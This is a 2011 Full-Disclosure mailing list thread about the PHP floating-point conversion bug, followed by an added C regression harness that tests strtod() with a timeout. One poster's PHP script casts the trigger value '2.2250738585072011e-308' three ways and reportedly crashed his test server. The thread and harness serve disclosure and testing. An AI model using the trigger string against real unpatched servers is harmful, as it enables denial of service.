Ah, been reading more about it, seems it was fixed. Still, there should have been safeguards around this - I'm thinking they should check existing conversion routines to ensure they're safe...
On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras <[email protected]> wrote:

> Was it fixed? What's the current status?
>
> That sounds like a major issue, and the lack of info about it is darn
> impressive.
>
> I tried it on my test Windows WAMP server:
>
> <?php
>
> ob_implicit_flush(true);
>
> echo 'Start test...<br/>';
>
> // Try 1: explicit cast
> $f=(float)"2.2250738585072011e-308";
> echo 'Try 1 => '.$f.'<br/>';
>
> // Try 2: floatval()
> $f=floatval("2.2250738585072011e-308");
> echo 'Try 2 => '.$f.'<br/>';
>
> // Try 3: cast of a string variable
> $f="2.2250738585072011e-308";
> echo 'Try 3 => '.(float)$f.'<br/>';
>
> echo 'Test failed, server not vulnerable!<br/>';
>
> ?>
>
> All three tests succeeded in crashing the server.
>
> With all due respect, this should NOT have been disclosed without being
> FIXED (as it seems to me).
> Plus, I'm a bit amazed such a bug exists in PHP - since converting to
> floating point is a trivial operation, it should have been limited and
> safe-guarded from the start.
> There are a lot of servers out there happily accepting input as floating
> point values, this bug should be top priority...
>
> Chris.
>
> On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser <[email protected]> wrote:
>
>> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>>
>> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Servers
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
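The reply above asks for existing conversion routines to be checked so that one input string cannot hang a server. The C harness below is an added example, not code from this thread or from the PHP project: it runs the system strtod() (the routine under test here; a project would substitute its own converter, such as the one PHP's (float) cast calls) in a forked child with a wall-clock limit, so a conversion that never returns is reported as a timeout instead of stalling the test runner. The sample inputs are constructed: the value quoted in the thread, the smallest normal double, a subnormal, and two ordinary values as controls. Function and enum names are assumptions for this example; fork(), waitpid() and nanosleep() are POSIX.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/* Outcome of one guarded conversion (names are this example's own). */
enum conv_status { CONV_OK = 0, CONV_TIMEOUT = 1, CONV_FAILED = 2 };

/* Convert `text` with strtod() in a forked child, allowing it `timeout_sec`
 * seconds of wall-clock time. A conversion that never returns (the failure
 * mode the thread describes) is reported as CONV_TIMEOUT rather than hanging
 * the caller; a child that crashes or parses nothing is CONV_FAILED. */
enum conv_status convert_with_timeout(const char *text, unsigned timeout_sec)
{
    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        return CONV_FAILED;
    }
    if (pid == 0) {
        char *end = NULL;
        volatile double v = strtod(text, &end); /* volatile: keep the call */
        (void)v;
        _exit(end != text ? 0 : 3);             /* 3: nothing was parsed */
    }

    const long step_ms = 50;                    /* polling interval */
    struct timespec step = { 0, step_ms * 1000000L };
    long waited_ms = 0;
    for (;;) {
        int status = 0;
        pid_t r = waitpid(pid, &status, WNOHANG);
        if (r == pid)
            return (WIFEXITED(status) && WEXITSTATUS(status) == 0)
                       ? CONV_OK : CONV_FAILED;
        if (r < 0)
            return CONV_FAILED;
        if (waited_ms >= (long)timeout_sec * 1000L) {
            kill(pid, SIGKILL);                 /* the child is stuck: reap it */
            waitpid(pid, &status, 0);
            return CONV_TIMEOUT;
        }
        nanosleep(&step, NULL);
        waited_ms += step_ms;
    }
}

/* Constructed regression inputs: the value from the thread, the smallest
 * normal double (DBL_MIN), a subnormal, and ordinary values as controls. */
static const char *const SAMPLES[] = {
    "2.2250738585072011e-308",
    "2.2250738585072014e-308",
    "1e-320",
    "0.1",
    "1e308",
};
#define NUM_SAMPLES (sizeof SAMPLES / sizeof SAMPLES[0])

/* Runs every sample through the guarded converter and returns how many did
 * not convert cleanly within timeout_sec. Zero means the routine passed. */
int count_unsafe_samples(unsigned timeout_sec)
{
    int unsafe = 0;
    for (size_t i = 0; i < NUM_SAMPLES; i++) {
        enum conv_status s = convert_with_timeout(SAMPLES[i], timeout_sec);
        printf("%-26s -> %s\n", SAMPLES[i],
               s == CONV_OK ? "ok" : s == CONV_TIMEOUT ? "TIMEOUT (hang)" : "FAILED");
        if (s != CONV_OK)
            unsafe++;
    }
    return unsafe;
}

int main(void)
{
    int unsafe = count_unsafe_samples(2);
    printf("%d unsafe conversion(s)\n", unsafe);
    return unsafe == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
```

The child process is what makes this usable as a regression test: a converter that loops forever would otherwise take the whole test binary with it, whereas here the parent reaps the stuck child and moves on to the next sample, and a non-zero count is a signal to stop accepting untrusted numeric input through that routine until it is patched.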
